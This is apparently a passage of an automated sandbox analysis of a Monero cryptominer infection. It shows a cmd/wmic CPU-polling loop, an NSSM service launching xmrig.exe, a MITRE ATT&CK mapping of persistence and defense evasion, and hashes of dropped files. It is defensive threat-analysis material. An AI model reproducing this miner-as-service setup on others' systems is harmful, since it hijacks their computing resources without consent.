  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4580
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3196
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4904
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3832
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3140
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3460
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3544
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4704
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3912
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4656
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3932
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1000
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1484
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4060
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4052
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4468
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2204
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5072
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3380
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2864
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1632
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3352
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1896
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3432
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4020
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3848
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4324
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3988
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4816
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4556
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5116
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3484
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3104
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3868
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1852
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2916
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4764
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3032
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2212
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4184
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1048
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1348
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3944
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2804
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4472
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2740
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2456
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2428
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4188
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2432
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4428
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1064
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:360
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4220
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3480
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4332
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4240
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3400
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2392
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3424
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4724
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:428
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2216
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4944
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1108
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4416
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3956
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4588
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:236
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3844
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1184
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:60
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:880
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1704
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1448
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4960

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:656
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4840

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ea6243fdb2bfcca2211884b0a21a0afc

SHA1
2eee5232ca6acc33c3e7de03900e890f4adf0f2f

SHA256
5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

SHA512
189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
71b41fd6d3710494b0d2a145de73ccba

SHA1
c50877bbf2cbc8b5edabd5452f60de329775be35

SHA256
4ad38725ea7198f60249334c093f139d5fe00c978c9038e62c782fd8e910fa9e

SHA512
aeb475fccf6b5e20acb5dd1eedff4a3304629afc102ea879aa8709d19632d6604a6100dd8201be9ccbfe6d9b639b796b8471bf09b80965d1cfe900c397f66ceb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6c2d6bf0366c263ad20449bb0d4c6aa3

SHA1
eaa24b1f6afef91c678c879e08528cc091ff9978

SHA256
1907728ab9993a5fdb352dff9998a5537822c5b63f7bf45cd3201fa8c67ccd86

SHA512
d5f332a02a6a63d40d4229015c95d7b19006c64814851d153dfb06f7b22a70152d1ebd14bd6e23169f05546c116c8d8048ed799426911626fe781db8602ac5cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3c581ce9a8d1547a758ffcf55f553c89

SHA1
9eb84e19978ebdabd72f80338677cb221b98b1f4

SHA256
583e06bd5c16495ce78d13a521625fd68e71e59ff4e1f7eea2ef25fdf833a4ee

SHA512
929b3354e95d2af10798e271f6df1b5e4491637c40330b4637ddcc654eba358cd24c3210242412337894871967bcddc7d75486dab9136f371bf7a919d4c3ec9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4d302e50e524f8f7f1d5ca9145595e56

SHA1
e609ae01790772ab17f7172aa11f09502f154c93

SHA256
69296bafe32db2ca481175c56ab465872a35c8eeb23894f834c0f8452a5b835a

SHA512
516490fde216adabdfdc9c8a391c2f35fbc86a8246bbdb7012c5839c117a55ada386513cb6fcab97c37bfafc74fbab25c091f121892ad4e623b91d989b7da8dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4c1703bade5891c618d2c6d073014cb8

SHA1
611d4c67b634844933fbedfcab9bd0e295acc054

SHA256
0f4229b686f278ab9542da89620f5aee06de5949f85e37f9229ee9ee1b4873ca

SHA512
765d5a5577abcb6608edb0cb19ae2ff53af6b3d6c2c438e785521b20e3937e46be9a46af4733dd623ca248c68347df878930168c247b5a06c1f9f38611954af3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
797faa7deb3a6480412dd7e93c0713ea

SHA1
f678de0a91265faf48beb487ec266c556e9206e5

SHA256
a05ee0c919a8b95ad31aa0317c684f4f1cf59204200bf061aeb3f6e042aa8cb5

SHA512
e68f9f4750d19dece0d0abcf7f1af1e3fc75eeb7743a28f4e7ebf3b0f489f62041705ea60b6f8869a5b8765dbfc45fbf757c00777babffe718b9c88cc72a41e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
25cc4047eda5df712975054a25806f20

SHA1
c2815672957e3bbe17831d3b8136925899138388

SHA256
9e7753ff2c8e89837b39c96261d46f9d05d13ad730e99564294c7f1d8aa12cd2

SHA512
3e98d9d9138b053eb540924e12e7fd38f5a343c187b6f206b3e493c1331b3dd4d17f49b9d3f2f4290190a411fd1e7ee4b622ff80b0b55d61f331efce1675546d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
50c15d893a7ccfa4e3e5966e33414cb1

SHA1
0be9ad347fffb97ee12e3f8814c68ab4cd53dda1

SHA256
4c8473126872f469a4a698ed4d2518b9be5079bfdbc665c4a1a9b0cbb07638a9

SHA512
f459b8a6b17402375c4e014a1f2908238a5993fca138f6c84609e11f1d8dd2a34e95b93a98b7ced49ecb9dd7ed6462c1ee7bec260bd75753c09d8ee91f294865

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0fdcc467e11938a9a1cecf40155bc15f

SHA1
207cab5fe97c9103876f8589aeb5456d3684e520

SHA256
2e018602cce55e848701ae804e4373960f0593ebd348cbec1e442bcc0246a7df

SHA512
596fa70e425fb90b68a8fc77ccdb6c2123646d78058a791ba5a7a5879d10e8e2eab181452d72872447ec0343ca424be42126dde32baa3b821caa647328c87340

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
99507be93696f70478b071a4f3003a36

SHA1
753cb625aa7ad2c1071f1ae23be3a8d6686da4a0

SHA256
40d615675b97320b6a7a213c8ab64a621d523399e6f6afbe6d82f3d53f0b841a

SHA512
092f8f7dadd5d746a7045d9cb104c98b919518706cb9fc63c4620641ee02ab20aacb16151b2b2a5d4b2430bcf095b8f92a466e37b3e687a65f0603ddb5e91031

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fb16e4f35d4c821f2e930860ce905073

SHA1
455330cf997d9fa24da44edfb3b8a1e6942817c1

SHA256
e55e21e00166028a5452552d0b3c0d1afd1906b2de3ca662d3ff8a52a39c46c5

SHA512
0a1e5257272083568eba7501f3905317fcefe91fea9ea6b942a93730e034a3fd54f20723c6be1a6f2aa3560b5c27ad878ee529cbea5579c3260a6502616e4bdb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
612B

MD5
f9dda377aeb23987138c3777437f06ae

SHA1
9b1cb6d25405bd51a726a4913ac4fe221bd095a0

SHA256
6df786f3e056520169914711b790a3886dac73e414ebd2573427c26096af3cb3

SHA512
9dacdb05c323e04fb69dd6148063291a2e8de3afa1907ec4a7a827d8ff3e5c257046de7e328b77f955d1b4187530b55ba66a8c93ba0289499d3aa92817b2668e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2648507fa2792c42b35384441993cdae

SHA1
8aaea27fa9da39b9c676896b2e3f3c02380747b3

SHA256
e51740665b030c00bdf0ed334e7784a1aa894cd714d41ee99fa27b0b8af5884c

SHA512
441c836ac4449c9770713e6d469eaa68f9d29cca24c069360c5b06de0b5cb7908d91d5af2561067b9c751a87caf9cd18e945822bac4a8283013c57bfe1c5359d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_44jyvhk0.xcn.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\script_6b0a8929.bat

Filesize
556B

MD5
889ed31bd87dcdd18996201e93fca965

SHA1
bebcb6fa0d36fabc6edc469cc3177251bd50dbb8

SHA256
6fd0f837746697ef471db89d8fa9290114c4c2dd416020f5ad9dc1837fb16ee7

SHA512
11e131928d8a7fd30b20943aeda62a9185b9b961fc577a75a6de87635b5a89a13fcbbfbbf0abd8e6a5cdc3052ef98c40bbebb33252ec00e73fcf18debda10f0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp754F.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
67099c11aee7715195c370daf8713cf6

SHA1
4ffe1365749d5828225c3c91efbf37524f6b4574

SHA256
91a469ac7711ea2098eeed42b648548c51a109b83fd54fac53b643a4d9f127c8

SHA512
4a4351749e0a6dfb211196af3eb892486c3df501ec6923cad96c16605e40cca3febaf908ece586e36a55b2945141140c18c0359badd0d609999aed747221145b

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
65af2c948d2b89c9a105d1fb0b467885

SHA1
1344cc7d00abe84bdbd9f35c7ce4a665e7e45773

SHA256
90f5d28d166590d5854231b924a0115ccc1ebc6c2ae56e14b787b05e83c78e4a

SHA512
37536a9629a61a83cd31f22cfb63d381bc2b13bf4bbc84f40d475b14e7e80df11434697e5b57814fccfcc04be31937aab84de5260af6321111904dfd200a92a6

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
695a85cf47fc71f1250af133bf7aefae

SHA1
b8c6dc2a2298b78c55b2f90bb024d9a1bf7dc952

SHA256
c0c3a93d47daaa65bf89ce6c1f31e6b8cf6fdd8fce75ce47b140c123012ee2bd

SHA512
9837c2e4b644e99d63c48fd685a53a27d0ff37c4c4e80b07841bc09a1ade67f0c450aebfcee811e28ae05ed85a9e705ca0bbc7a40634f1433078f82eb220904e

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
f6d715974515a75604d133ec45f6890e

SHA1
eb14e4c87b31b67f52580b758495dbc3c1f36660

SHA256
5fef1c22da7229c93d9d1f35ef41bd44ea27da2d409f1ab7091e19becb6f8a8c

SHA512
a5c79a4623b4266d42f91a3bd99c7519700a936737ef8654d8e282024b479d83fc723eac2dd5828cb5001b15e2248d431acf49392daaaa531c91a11edeac9488

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
388a13ada272e44e64e58741fbf9c52d

SHA1
6625fd885869618eb88630d114b0cf482dcc13e2

SHA256
c57fd59be629bd3045ac5f32e68cc7c55061efcf1cebbebb978de82043dbb503

SHA512
e16a5bf105949ee293508fd11a78fb64ec5ba2c49c25b060c0e9558e778cce229ec6c7f7c1316a838b6acb0016b9d06f5d6c7feadb94b9590f4516a148eb9c48

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/1996-180-0x0000000000080000-0x00000000000A0000-memory.dmp

Filesize
128KB

Download
memory/1996-181-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3368-25-0x00007FF954660000-0x00007FF95504C000-memory.dmp

Filesize
9.9MB

Download
memory/3368-51-0x00007FF954660000-0x00007FF95504C000-memory.dmp

Filesize
9.9MB

Download
memory/3368-22-0x00007FF954660000-0x00007FF95504C000-memory.dmp

Filesize
9.9MB

Download
memory/3368-9-0x00007FF954660000-0x00007FF95504C000-memory.dmp

Filesize
9.9MB

Download
memory/3368-8-0x0000017DEA3B0000-0x0000017DEA426000-memory.dmp

Filesize
472KB

Download
memory/3368-5-0x0000017DEA280000-0x0000017DEA2A2000-memory.dmp

Filesize
136KB

Download
memory/3368-2-0x00007FF954663000-0x00007FF954664000-memory.dmp

Filesize
4KB

Download
